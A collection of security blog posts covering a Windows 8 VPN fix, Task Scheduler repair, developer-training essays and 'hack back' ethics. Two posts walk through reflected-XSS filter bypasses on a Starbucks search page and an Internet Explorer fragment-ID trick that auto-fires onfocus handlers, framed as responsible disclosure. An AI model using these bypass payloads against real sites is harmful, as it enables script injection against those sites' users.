It should be easy enough to set up a VPN in Windows, and everything should work well, because Microsoft has been doing these sorts of things for some years.
Sure enough, if you open up the Charms bar, choose Settings, Change PC Settings, and finally Network, youâre brought to this screen, with a nice big friendly button to add a VPN connection. Tapping on it leads me to the following screen:
No problems, Iâve already got these settings ready to go.
Probably not the best to name my VPN settings âNew VPNâ, but then Iâm not telling you my VPN endpoint. So, letâs connect to this new connection.
So far, so good. Now itâs verifying my credentialsâŠ
And then we should see a successful connection message.
Not quite. For the search engines, hereâs the text:
Error 860: The remote access connection completed, but authentication failed because of an error in the certificate that the client uses to authenticate the server.
This is upsetting, because of course Iâve spent some time setting the certificate correctly (more on that in a later post), and I know other machines are connecting just fine.
Iâm sure that, at this point, many of you are calling your IT support team, and theyâre reminding you that they donât support Windows 8 yet, because some lame excuse about ânot yet stable, official, standard, or Linuxâ.
Donât take any of that. Simply open the Desktop.
What? Yes, Windows 8 has a Desktop. And a Command Prompt, and PowerShell. Even in the RT version.
Oh, uh, yeah, back to the instructions.
Forget navigating the desktop, just do Windows-X, and then W, to open the Network Connections group, like this:
Select the VPN network youâve created, and select the option to âChange settings of this connectionâ:
In the Properties window that pops up, you need to select the Security tab:
OK, so thatâs weird. The Authentication Group Box has two radio buttons â but neither one is selected. My Grandma had a radio like that, you couldnât tell what station you were going to get when you turn it on â and the same is generally true for software. So, we should choose one:
It probably matters which one you choose, so check with your IT team (tell them youâre connecting from Windows 7, if you have to).
Then we can connect again:
AndâŠ weâre connected.
Now for another surprise, when you find that the Desktop Internet Explorer works just fine, but the âModern UIâ (formerly known as âMetroâ) version of IE decides it will only talk to sites inside your LAN, and wonât talk to external sites. Oh, and that behavior is extended to any Metro app that embeds web content.
Iâm still working on that one. News as I have it!
Every few months, something encourages me to make the tweet that:
OK, so the choice of calling these âSDKsâ is rooted in my Microsoft dev background, where âsample codeâ didnât need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.
The basic point here is to remind you that you do not get to abrogate all responsibility by saying âthis is sample code, you will need to add error checking and securityâ, even if you do say it in the article â even if you say it in the comments of the sample!
Simply stated, Iâve seen too many cases where people have included three lines of code (or five, or twenty, the count doesnât matter) into a program, and theyâve stepped away and shipped that code.
âIt wasnât my fault,â they say, when the incident happens, âI copied that code from a sample online.â
This is the point at which the re-education machine is engaged â because, of course, it totally is your fault, if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished â usually by having to stay late and fix it.
Itâs also the sample writerâs fault.
He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with âwell, of course, you should add your own error checks and security magic to itâ.
Hereâs an example of what Iâm talking about, courtesy of Troy Hunt linking to an ASP forum.
No, if youâre providing sample code on the Internet, itâs important to make sure it doesnât embody BAD design; this is code that will be taken up by people by definition less keen, less eager, less smart and less motivated to do things right than you are â after all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how itâs done. If you then teach them how itâs done badly, thatâs how they will learn to do it â badly. And they will teach others.
So, instead, make your three line samples five lines, and add enough error checking that unexpected issues or other bad things will break the sampleâs execution.
Iâve been playing a lot lately with cross-site scripting (XSS) â you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.
Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.
And to a certain extent, thatâs deserved.
But I always report what I find, and I donât blog about it until Iâm sure the company has fixed the issue.
Right, and having known a few people whoâve worked in the Starbucks security team, I was surprised that I could find anything at all.
Yet it practically shouted at me, as soon as I started to inject script:
Well, thereâs pretty much a hint that Starbucks have something in place to prevent script.
But itâs not the only thing preventing script, as I found with a different search:
So, one search takes me to an âoopsâ page, another takes me to a page telling me that nothing happened â but without either one executing the script.
The oops page doesnât include any of my script, so I donât like that page â it doesnât help my injection at all.
The search results page, however, that includes some of my script, so if I can just make that work for me, Iâll be happy.
Viewing source is pretty helpful, so hereâs what I get from that, plus searching for my injected script:
At this point, I figure that I need to find some execution that is appropriate for this context.
Maybe the XSS fish will help, so I search for that:
Looks promising â no âoopsâ, letâs check the source:
This is definitely working. At this point, I know the site has XSS, I just have to demonstrate it. If I was a security engineer at Starbucks, this would be enough to cause me to go beat some heads about.
This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all weâre debating about is how much I can do now that Iâve broken in.
I have to go on at this point, because Iâm an external researcher to this company. I have to deliver to them a definite breach, or theyâll probably dismiss me as a waste of time.
The obvious thing to inject here is â”><script>prompt(1)</script>â â but we saw earlier that produced an âoopsâ page. Weâve seen that âprompt(1)â isnât rejected, and the angle-brackets (chevrons, less-than / greater-than signs, etc, whatever you want to call them) arenât rejected, so it must be the word âscriptâ.
That, right there, is enough to tell me that instead of encoding the output (which would turn those angle-brackets into â<â and â>â in the source code, while still looking like angle-brackets in the display), this site is using a blacklist of âbad words to search forâ.
Thatâs a really good question â and the basic answer is because you just canât make most blacklists complete. Only if you have a very limited character set, and a good reason to believe that your blacklist can be complete.
A blacklist that might work is to say that you surround every HTML tagâs attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.
I say it âmight workâ, because in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.
Easier by far, to use a whitelist â only these few characters are safe,and ALL the rest get encoded.
You might have an incomplete whitelist, but thatâs easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.
OK, so having determined that I canât use the script tag, maybe I can add an event handler to the tag Iâm in the middle of displaying, whether itâs a link or an input. Perhaps I can get that event handler to work.
Ever faithful is the âonmouseoverâ event handler. So I try that.
You donât need to see the âoopsâ page again. But I did.
The weirdest thing, though, is that the âonmooseoverâ event worked just fine.
Except I didnât have a moose handy to demonstrate it executing.
So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasnât.
Similarly, âonfocusâ triggered the âoopsâ page, but âonficusâ didnât. Again, sadly I didnât have a ficus with me.
Sure, but then so is the community of browser manufacturers. Thereâs a range ofÂ âontouchâ events that werenât on the blacklist, but are supported by a browser or two â and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce âonwaveatâ. Again, the blacklist isnât future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.
Then I tried adding characters to the beginning of the event name. Curious â that works.
And, yes, the source view showed me the event was being injected. Of course, the browser wasnât executing it, because of course, â?onmouseoverâ canât be executed. The HTML spec just doesnât allow for it.
Eventually, I made my way through the ASCII table to the forward-slash character.
Yes, thatâs it, that executes. Thereâs the prompt.
Weirdly, if I used âalertâ instead of âpromptâ, I get the âoopsâ page. Clearly, âalertâ is on the blacklist, âpromptâ is not.
I still want to make this a âhotterâ report before I send it off to Starbucks, though.
Well, itâd be nice if it didnât require the user to find and wave their mouse over the page element that youâve found the flaw in.
Fortunately, Iâd also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And thereâs an âonfocusâ event I can trigger with â/onfocusâ.
So, there we are â automated execution of my chosen code.
Sure â how about something an attacker might try â a redirect to a site of their choosing. [But since Iâm not an attacker, weâll do it to somewhere acceptable]
I tried to inject âonfocus=âdocument.location=â//google.comâââ â but apparently, âdocumentâ and âlocationâ are also on the banned list.
âownerDocuâ, âmentâ, âlocaâ and âtionâ arenât on the blacklist, so I can do âthis[“ownerDocu”+”ment”][“loca”+”tion”]=â âŠ
Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.
Now itâs ready to report.
Well, no, not really. This took me a couple of months to get reported. I tried âsecurity@starbucks.comâ, which is the default address for reporting security issues.
An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.
I try the webmaster@ address, and that gets me nowhere.
The âContact Usâ link takes me to a customer service representative, and an entertaining exchange that results in them telling me that theyâve passed my email around everyone whoâs interested, and the general consensus is that I should go ahead and publish my findings.
No, Iâm not interested in self-publicising at the cost of someone elseâs security. I do this so that things get more secure, not less.
So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.
The Information Security team works with me, politely, quickly, calmly, and addresses the problem quickly and completely. The blacklist is still there, and still takes you to the âoopsâ page â but itâs no longer the only protection in place.
My âonmooseoverâ and âonficusâ events no longer work, because the correct characters are quoted and encoded.
The world is made safer and more secure, and a half a year later, I post this article, so that others can learn from this experience, too.
By withholding publishing until well after the site is fixed, I ensure that Iâm not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.
The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.
And did I ever tell you about the time I got onto Googleâs hall of fame?
Reading a story on the consequences of the theft of Adobeâs source code by hackers, I come across this startling phrase:
The hackers seem to be targeting vulnerabilities they find within the stolen code. The prediction is that theyâre sifting through the code, attempting to find widespread weaknesses, intending to exploit them with maximum effect by using zero-day attacks.
What Iâd love to know is why we arenât seeing a flood of developers crying out to be educated in how they, too, can learn to sift through their own code, attempt to find widespread weaknesses, so they can shore them up and prevent their code from being exploited.
An example of the sort of comments we are seeing can be found here, and they are fairly predictable â âdoes this mean Open Source is flawed, if having access to the source code is a security riskâ, schadenfreude at Adobeâs misfortune, all manner of assertions that Adobe werenât a very secure company anyway, etc.
So, if youâre in the business of developing software â whether to sell, licence, give away, or simply to use in your own endeavours, youâre essentially in the same boat as Adobe prior to the hackers breaching their defences. Possibly the same boat as Adobe after the breach, but prior to the discovery.
Unless you are doing something different to what Adobe did, you are setting yourself up to be the next Adobe.
Obviously, Adobe isnât giving us entire details of their own security program, and whatâs gone right or wrong with it, but previous stories (as early as mid-2009) indicated that they were working closely with Microsoft to create an SDL (Security Development Lifecycle) for Adobeâs development.
So, instead of being all kinds of smug that Adobe got hacked, and you didnât, maybe you should spend your time wondering if you can improve your processes to even reach the level Adobe was at when they got hacked.
And, to bring the topic back to what started the discussion â are you even doing to your software what these unidentified attackers are doing to Adobeâs code?
How long are you spending to do that, and what tools are you using to do so?
In a classic move, clearly designed to introduce National Cyber Security Awareness Month with quite a bang, the US Government has shut down, making it questionable as to whether National Cyber Security Awareness Month will actually happen.
In case the DHS isnât able to make things happen without funding, hereâs what they originally had planned:
Iâm sure youâll find myself and a few others keen to engage you on Information Security this month in the absence of any functioning legislators.
Maybe without the government in charge, we can stop using the âCâ word to describe it.
The âCâ word Iâm referring to is, of course, âCyberâ. Bad word. Doesnât mean anything remotely like what people using it think it means.
The main page of the DHS.GOV web site actually does carry a small banner indicating that thereâs no activity happening at the web site today.
So, there may be many NCSAM events, but DHS will not be a part of them.
I admit that itâs a little strange to look at your event log fairly often, but I occasionally find interesting behaviour there, and certainly whenever I encounter an unexpected error, thatâs where I look first.
Because thatâs actually where developers put information relating to problems youâre experiencing.
So, when I tried to install Windows 8.1 and was told that I would be able to keep âNothingâ â no apps, no settings, etc â I assumed there would be an error in the log.
But all I saw was this:
So, yes, thatâs an error with:
Event ID: 16385
Error Code: 0x80041316
This goes back to September 2, but only because the Application log that itâs in has already run out of room and ârolled overâ with too many entries. Presumably, then, the occurrence that caused this was prior to that.
Searching online, I find that there are some others who have experienced the same thing, the most recent of which is in January 2013, and who posted of this error to the TechNet forums.
A Microsoft representative had answered indicating that the cause could be (of all strange things) a partition with no name. Odd. Then they suggested Refreshing or Reinstalling the PC.
Iâm not reinstalling unless thereâs something hugely wrong, and the refresh didnât help at all.
So, on to tracing the cause of the problem.
âScheduleâ suggests it might be a Task Scheduler issue, and sure enough, when I open up the Task Scheduler (itâs under the Administrative Tools in the Control Panel, so making it very hard to find in Windows 8), I get the following error:
Or for the search engines to find, title: âTask Schedulerâ, text: âTask SvcRestartTask: The task XML contains an unexpected node.â
Itâs a matter of fairly simple searching (as an Administrator, naturally) to find this file âSvcRestartTaskâ under C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform.
So I moved this file to a document SvcRestartTask.xml in a different folder.
Time to edit it.
Among other lines in the file, these stood out:
Odd â two values for Priority, one numeric, one text. So I went hunting in a file from a system that didnât have that problem. I found these lines in the same place:
So, clearly something had written to the SvcRestartTask file with incorrect names for these elements. Changing them around in my XML version of the file, I reopened the Task Scheduler UI, navigated down to Microsoft / Windows / SoftwareProtectionPlatform, and imported the XML file there. [This is under âActionsâ, but you can also right-click the folder SoftwareProtectionPlatform and select âImportâ, then âRefreshâ]
Sadly, this wasnât quite the end of things, because the Task Scheduler UI fails to talk to the Task Scheduler service. Nor can I restart the Task Scheduler service directly.
So a restart will take care of that, and sure enough, now that Iâve restarted, I see no more of these 16385 errors from Security-SPP.
Itâs just a shame it took so long to get this answer, and that the Microsoft-supplied answer in the forums is incomplete.
Oh, and of course, one last thing â what does SPP (Software Protection Platform) actually do?
Since this is an element of the Windows Genuine Advantage initiative, with the goal of preventing use of pirated copies of Windows, you might consider you donât really need / want it around. Either way, you definitely donât want it clearing your Application event log out every three weeks!
Iâve done an amount of training developers recently, and it seems like there are a number of different kinds of responses to my security message.
[You can safely assume that thereâs also something thatâs wrong with the message and the messenger, but I want to learn about the thing I likely canât control or change â the supply of developers]
Here are some unfairly broad descriptions of stereotypes Iâve encountered along the way. The truth, as ever, is more nuanced, but I think if I can reach each of these target personas, I should have just about everyone covered.
Is there anyone Iâve missed?
Iâm always happy to have one or more of these people in the room â the sort of developer who has some experience, and has been on a project that was attacked successfully at some point or another.
This kind of developer has likely quickly learned the lesson that even his own code is subject to attack, vulnerable and weak to the persistent probes of attackers. Perhaps his experience has also included examples of his own failures in more ordinary ways â mere bugs, with no particular security implications.
Usually, this will be an older developer, because experience is required â and his tales of terror, unrehearsed and true, can sometimes provide the âscared straightâ lesson I try to deliver to my students.
This guy is usually a smart, younger individual. He may have had some previous nefarious activity, or simply researched security issues by attacking systems he owns.
But for my purposes, this guy can be too clever, because he distracts from my talk of âleast privilegeâ and âdefence in depthâ with questions about race conditions, side-channel attacks, sub-millisecond time deltas across multi-second latency routes, and the like. IF those were the worst problems we see in this industry, Iâd focus on them â but sadly, sites are still vulnerable to simple attacks, like my favourite â Reflected XSS in the Search field. [Simple exercise â watch a commercial break, and see how many of the sites advertised there have this vulnerability in them.]
But I like this guy for other reasons â heâs a possible future hire for my team, and a probable future assistant in finding, reporting and addressing vulnerabilities. Keeping this guy interested and engaged is key to making sure that he tells me about his findings, rather than sharing them with friends on the outside, or exploiting them himself.
Unbelievably to me, there are people who âdone a project on itâ, and therefore know all they want to about security. If what I was about to tell them was important, theyâd have been told it by their professor at college, because their professor knew everything of any importance.
I personally wonder if this is going to be the kind of SDE who will join us for a short while, and not progress â because the impression they give to me is that theyâve finished learning right before their last final exam.
Related to the previous category is the developer who only does what it takes to get paid and to receive a good performance review.
I think this is the developer I should work the hardest to try and reach, because this attitude lies at the heart of every developer on their worst days at their desk. When the passion wanes, or the task is uninteresting, the desire to keep your job, continue to get paid, and progress through your career while satisfying your boss is the grinding cog that keeps you moving forward like a wind-up toy.
This is why it is important to keep searching to find ways of measuring code quality, and rewarding people who exhibit it â larger rewards for consistent prolonged improvement, smaller but more frequent rewards to keep the attention of the developer who makes a quick improvement to even a small piece of code.
Sadly, this guy is in my class because his boss told him he ought to attend. So I tell him at the end of my class that he needs to report back to his boss the security lesson that he learned â that all of his development-related goals should have the adverb âsecurelyâ appended to them. So âdevelop feature Xâ becomes âdevelop feature X securelyâ. If that is the one change I can make to this developerâs goals, I believe it will make a difference.
Iâve been doing this for long enough that I see the same faces in the crowd over and over again. I know I used to be a fanboy myself, and so Iâm aware that sometimes this is because these folks learn something new each time. Thatâs why I like to deliver a different talk each time, even if itâs on the same subject as a previous lesson.
Or maybe they just didnât get it all last time, and need to hear it again to get a deeper understanding. Either way, repeat visitors are definitely welcome â but I wonât get anywhere if thatâs all I get in my audience.
Some developers do the development thing because they canât NOT write code. If they were independently wealthy and could do whatever they want, theyâd be behind a screen coding up some fun little app.
I like the ones with a calling to this job, because I believe I can give them enough passion in security to make it a part of their calling as well. [Yes, I feel I have a calling to do security â I want to save the world from bad code, and would do it if I was independently wealthy.]
Sadly, the hardest person to reach â harder even than the Salaryman â is the developer who matches the stereotypical perception of the developer mindset.
Convinced of his own superiority and cleverness, even if he doesnât express it directly in such conceited terms, this person will see every suggested approach as beneath him, and every example of poor code as yet more proof of his own superiority.
âSure, youâve had problems with other developers making stupid security mistakes,â heâll think to himself, âBut Iâm not that dumb. Iâve never written code that bad.â
I certainly hope you wonât ever write code as bad as the examples I give in my classes â those are errant samples of code written in haste, and which I wouldnât include in my class if they didnât clearly illustrate my point. But my point is that your colleagues â everyone around you â are going to write this bad a piece of code one day, and it is your job to find it. It is also their job to find it in the code you write, so either you had better be truly as good as you think you are, or you had better apply good security practices so they donât find you at your worst coding moment.
Iâve found a new weekend hobby â it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.
I open my favourite search engine (Iâm partial to Bing, partly because I get points, but mostly because Iâve met the guys who built it), search for âsecurity blogâ, and then pick one at random.
Once Iâm at the security blog site â often one Iâve never heard of, despite it being high up in the search results â I find the search box and throw a simple reflected XSS attack at it.
If that doesnât work, I view the source code for the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.
[Note: I use reflected XSS, because I know I can only hurt myself. I donât play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and Iâm being paid.]
Finally, I try to find who I should contact about the exploitability of the site.
Itâs interesting just how many of these sites are exploitable â some of them falling to the simplest of XSS attacks â and even more interesting to see how many sites donât have a good, responsive contact address (or prefer simply not to engage with vuln discoverers).
I clearly wouldnât dream of disclosing any of the vulnerabilities Iâve found until well after theyâre fixed. Of course, after theyâre fixed, Iâm happy to see a mention that Iâve helped move the world forward a notch on some security scale. [Not sure why Iâm not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.
From clicking the link to exploit is either under ten minutes or not at all â and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.
You can try using a WAF to solve your XSS problem, but then youâve got two problems â a vulnerable web site, and that you have to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it really doesnât ever fix the problem.
If you can, donât echo back to me what I sent you, because thatâs how these attacks usually start. Donât even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.
Unless youâre running a source code site, you probably donât need me to search for angle brackets, or a number of other characters. So take them out of my search â or plain reject my search if I include them in my search.
OK, so you donât have to encode the basics â what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.
Yeah, thatâs always the hard part. Encode it using the right encoding. Thatâs the short version. The long version is that you figure out whatâs going to decode it, and make sure you encode for every layer that will decode. If youâre putting my text into a web page as a part of the pageâs content, HTML encode it. If itâs in an attribute string, quote the characters using HTML attribute encoding â and make sure you quote the entire attribute value! If itâs an attribute string that will be used as a URL, you should URL encode it. Then you can HTML encode it, just to be sure.
[Then, of course, check that your encoding hasnât killed the basic function of the search box!]
You should definitely respond to security reports â I understand that not everyone can have a 24/7 response team watching their blog (I certainly donât) â you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they donât get a response much sooner, and see that as cause to publish their findings.
Me, I send a message first to ask if Iâve found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.
Iâve said before that I wish programmers would respond to reports of XSS as if Iâd told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.
I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]
Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.
XSS issues are significant and severe because:
So, I enjoy reporting XSS issues to web sites and seeing how they fix them.
It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.
So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.
A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.
One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.
I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.
Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?
Could I make the attack more “sexy”?
Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.
I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.
You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:
The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc]
The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.
[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]
This anchor identifier in the URL is also known as a “fragment identifier”, because technically the anchor is the entire URL. Not what people make as common usage, though.
XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.
So, the stupid thing that I thought about is “does this work for any name? and is it the same as focus?”
Sure enough, in the W3C documentation for HTML, here it is:
So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:
This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]
This is encouraging, because all those text boxes already have to have ids or names to work.
So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.
That’s the first stupid thing checked off and working.
But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.
Or is it?
Testing in Firefox, Chrome and Safari suggested not.
Testing in Internet Explorer, on the other hand, demonstrated that even for as old a version as IE8, all the way through IE9 and IE10, caused focus behaviour – including any “onfocus” handler – to trigger.
Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.
If you are attacking users of a vulnerable site that allows an attacker to inject code into an “onfocus” handler (new or existing), you can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.
You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q
OK, so you clicked it and it didn’t drop down the menu that normally comes when you click in the search field on Microsoft’s front page. That’s because the onfocus handler wasn’t loaded when the browser set the focus. Try reloading it.
You can obviously build any number of test pages to look at this behaviour:
Loading that with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.
No, I don’t think it is – I don’t know that it’s necessarily even a flaw.
The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]
It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.
And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.
Finally, the moral question has to be asked and answered.
I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour – because now those people are going to be using this on sites unaware of it. Even if the XSS injection is detected by the web site through looking in their logs, those same logs will tell them that the injection requires a user action – setting focus to a field – and that there’s nothing causing that to happen, so it’s a relatively minor issue.
Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.
So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.
I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.
In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.
The best I can do is communicate, and this is the best I know how.
Iâm putting this post in the âProgrammer Hubrisâ section, but itâs really not the programmers this time, itâs the managers. And the lawyers, apparently.
Well, yeah, it always does, and this time what set me off is an NPR article by Tom Gjelten in a series theyâre currently doing on âcybersecurityâ.
This article probably had a bunch of men talking to NPR with expressions such as âhell, yeah!â and âitâs about time!â, or even the more balanced âwell, the best defence is a good offenceâ.
Absolute rubbish. Pure codswallop.
Kind of, and no.
Weâre certainly not being âattackedâ in the means being described by analogy in the article.
"If you’re just standing up taking blows, the adversary will ultimately hit you hard enough that you fall to the ground and lose the match. You need to hit back." [says Dmitri Alperovitch, CrowdStrike’s co-founder.]
Yeah, except weâre not taking blows, and this isnât boxing, and theyâre not hitting us hard.
"What we need to do is get rid of the attackers and take away their tools and learn where their hideouts are and flush them out," [says Greg Hoglund, co-founder of HBGary, another firm known for being hacked by a bunch of anonymous nerds that he bragged about being all over]
Thatâs far closer to reality, but the people whose job it is to do that is the duly appointed law enforcement operatives who are able to enforce law.
"It’s [like] the government sees a missile heading for your company’s headquarters, and the government just yells, ‘Incoming!’ " Alperovitch says. "It’s doing nothing to prevent it, nothing to stop it [and] nothing to retaliate against the adversary." [says Alperovitch again]
No, itâs not really like that at all.
There is no missile. There is no boxer. Thereâs a guy sending you postcards.
Yep, pretty much exactly that.
Every packet that comes at you from the Internet is much like a postcard. Itâs got a from address (of sorts) and a to address, and all the information inside the packet is readable. [Thatâs why encryption is applied to all your important transactions]
Thereâs a number of ways. You might be receiving far more postcards than you can legitimately handle, making it really difficult to assess which are the good postcards, and which are the bad ones. So, you contact the postman, and let him know this, and he tracks down (with the aid of the postal inspectors) whoâs sending them, and stops carrying those postcards to you. In the meantime, you learn how to spot the obvious crappy postcards and throw them away â and when you use a machine to do this, itâs a lot less of a problem. Thatâs a denial of service attack.
Then thereâs an attack against your web site. Pretty much, that equates to the postcard sender learning that thereâs someone reading the postcards, whose job it is to do pretty much what the postcards tell them to do. So he sends postcards that say âpunch the nearest person to you really hard in the faceâ. Obviously a few successes of this sort lead you to firing the idiot whoâs punching his co-workers, and instead training the next guy as to what jobs heâs supposed to do on behalf of the postcard senders.
Iâm sure that my smart readers can think up their own postcard-based analogies of other attacks that go on, now that youâve seen these two examples.
Sure, send postcards, but unless you want the postman to be discarding all your outgoing mail, or the law enforcement types to turn up at your doorstep, those postcards had better not be harassing or inappropriate.
Even if you think youâre limiting your behaviour to that which the postman wonât notice as abusive, thereâs the other issue with postcards. Thereâs no guarantee that they were sent from the address stated, and even if they were sent from there, there is no reason to believe that they were official communications.
All it takes is for some hacker to launch an attack from a hospitalâs network space, and youâre now responsible for attacking an innocent target where lives could actually be at risk. [Sure, if that were the case, the hospital has shocking security issues of its own, but can you live with that rationalisation if your response to someone attacking your site winds up killing someone?]
I donât think that counterattack on the Internet is ethical or appropriate.